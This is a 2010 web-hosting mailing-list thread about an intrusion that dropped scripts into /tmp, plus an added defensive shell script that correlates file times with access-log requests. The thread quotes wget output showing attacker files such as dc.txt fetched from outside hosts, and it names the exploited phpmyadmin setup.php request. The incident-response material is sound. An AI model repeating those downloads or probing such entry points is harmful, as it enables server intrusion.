[BlueOnyx:05938] Re: hacker scripts

Gerald Waugh gwaugh at frontstreetnetworks.com
Mon Nov 29 13:07:34 -05 2010


On Mon, 2010-11-29 at 09:44 -0800, Ken - Precision Web Hosting, Inc
wrote:
> ----- Original Message ----- 
> From: "Gerald Waugh" <gwaugh at frontstreetnetworks.com>
> To: "BlueOnyx General Mailing List" <blueonyx at blueonyx.it>
> Sent: Monday, November 29, 2010 9:28 AM
> Subject: [BlueOnyx:05934] Re: hacker scripts
> 
> 
> >
> > On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
> >> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
> >> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
> >> > > How can I stop these people from downloading and running their 
> >> > > scripts
> >> > > in /tmp using httpd
> >> >
> >> > You need to find out how they did it. You're either hosting someone 
> >> > naughty, or someone who has an insecure script. Who owns the files?
> >> >
> >>   apache.apache
> >>
> >> The server has a site with Drupal and some other blog stuff
> >>
> >
> > /tmp type ext3 (rw,noexec,nosuid)
> >
> >
> >
> > [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not
> > exist:
> > /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
> > --06:02:38--  http://193.136.136.86/quixplorer/readme.txt
> >           => `readme.txt'
> > Connecting to 193.136.136.86:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 27,931 (27K) [text/plain]
> >
> >    0K .......... .......... .......                         100%   56.99 KB/s
> >
> > 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]
> >
> > --06:02:39--  http://realezsites.com/pers/cowtipper524/dc.txt
> >           => `dc.txt'
> > Resolving realezsites.com... 64.235.52.10
> > Connecting to realezsites.com|64.235.52.10|:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 2,140 (2.1K) [text/plain]
> >
> >    0K ..                                                    100%   2.40 MB/s
> >
> > 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]
> >
> > -- 
> > Gerald
> >
> 
> 
> Look at the time the files in the /tmp were created. Then look in your 
> access logs and see what site / php script was accessed at that time.
> 
> Check your drupal version and search on Google for
> "Exploits for Drupal version xxx"
> 

[29/Nov/2010:06:02:37 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14061 "http://208.67.252.235/phpmyadmin/scripts/setup.php" "Opera"

Looks like it's the phpmyadmin thing; I will have to find and move it...
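
The correlation Ken describes above (take the time the files appeared in /tmp, then find the web request that arrived at that moment) as an added worked example. This is editorial example code, not from the thread or from BlueOnyx. It assumes an Apache common/combined access log; the sample log is constructed for the demo (the 06:02:37 setup.php line is the one Gerald posted, the other three lines are invented benign requests), the file under /tmp is a stand-in, and the demo uses GNU touch to set its mtime.

```shell
#!/bin/sh
# Added example, not code from the mailing list or from BlueOnyx: correlate
# the modification time of a file dropped in /tmp with the Apache access-log
# requests that arrived within a window around it. Sample data is constructed.
set -eu

# Epoch seconds of a file's last modification: GNU stat first, BSD stat fallback.
mtime_epoch() {
    stat -c %Y "$1" 2>/dev/null || stat -f %m "$1"
}

# Print every access-log line whose "[dd/Mon/yyyy:HH:MM:SS +zzzz]" timestamp
# lies within WINDOW seconds of EPOCH.  Usage: requests_near EPOCH WINDOW LOGFILE
# The log timestamp is converted to a UTC epoch inside awk, honouring the
# offset written in the log, so the result does not depend on the TZ of the
# box you run this on.
requests_near() {
    awk -v t="$1" -v w="$2" '
    # days since 1970-01-01 for a civil date (days-from-civil algorithm)
    function days(y, m, d,    era, yoe, doy, doe) {
        if (m <= 2) y--
        era = int(y / 400)
        yoe = y - era * 400
        doy = int((153 * (m > 2 ? m - 3 : m + 9) + 2) / 5) + d - 1
        doe = yoe * 365 + int(yoe / 4) - int(yoe / 100) + doy
        return era * 146097 + doe - 719468
    }
    BEGIN {
        split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", mn, " ")
        for (i = 1; i <= 12; i++) mon[mn[i]] = i
    }
    {
        # common/combined log: $4 = "[29/Nov/2010:06:02:37", $5 = "-0600]"
        split(substr($4, 2), p, "[/:]")      # p: dd Mon yyyy HH MM SS
        lt  = days(p[3] + 0, mon[p[2]], p[1] + 0) * 86400 + p[4] * 3600 + p[5] * 60 + p[6]
        off = (substr($5, 2, 2) * 3600 + substr($5, 4, 2) * 60) * (substr($5, 1, 1) == "-" ? -1 : 1)
        e   = lt - off                       # local wall-clock minus its UTC offset
        if (e >= t - w && e <= t + w) print
    }' "$3"
}

# Constructed sample log. The 06:02:37 line is the one Gerald posted; the
# other three are invented benign requests to show the window filtering.
write_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [29/Nov/2010:06:00:10 -0600] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
208.67.252.235 - - [29/Nov/2010:06:02:37 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14061 "http://208.67.252.235/phpmyadmin/scripts/setup.php" "Opera"
10.0.0.7 - - [29/Nov/2010:06:02:40 -0600] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Nov/2010:06:15:02 -0600] "GET /node/1 HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
EOF
}

# Demo: a stand-in for /tmp/dc.txt with mtime 06:02:39 -0600 (the time wget
# reported saving it), then every request within 60 s of that moment.
demo() {
    work=$(mktemp -d)
    write_sample_log "$work/access_log"
    : > "$work/dc.txt"
    # GNU touch; 1291032159 = 29/Nov/2010 06:02:39 -0600 (assumed mtime)
    touch -d @1291032159 "$work/dc.txt" 2>/dev/null || true
    echo "requests within 60 s of mtime $(mtime_epoch "$work/dc.txt"):"
    requests_near "$(mtime_epoch "$work/dc.txt")" 60 "$work/access_log"
    rm -rf "$work"
}
demo
# On the real box (log path is a placeholder):
#   requests_near "$(mtime_epoch /tmp/dc.txt)" 60 /path/to/access_log
```

Widen the window if the file times and the log clock drift apart, and run it over every virtual site's log, since the dropped files are owned by apache and any vhost's script could have written them. The request that lines up with the file time, here the setup.php hit from 208.67.252.235, is the one to treat as the entry point.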
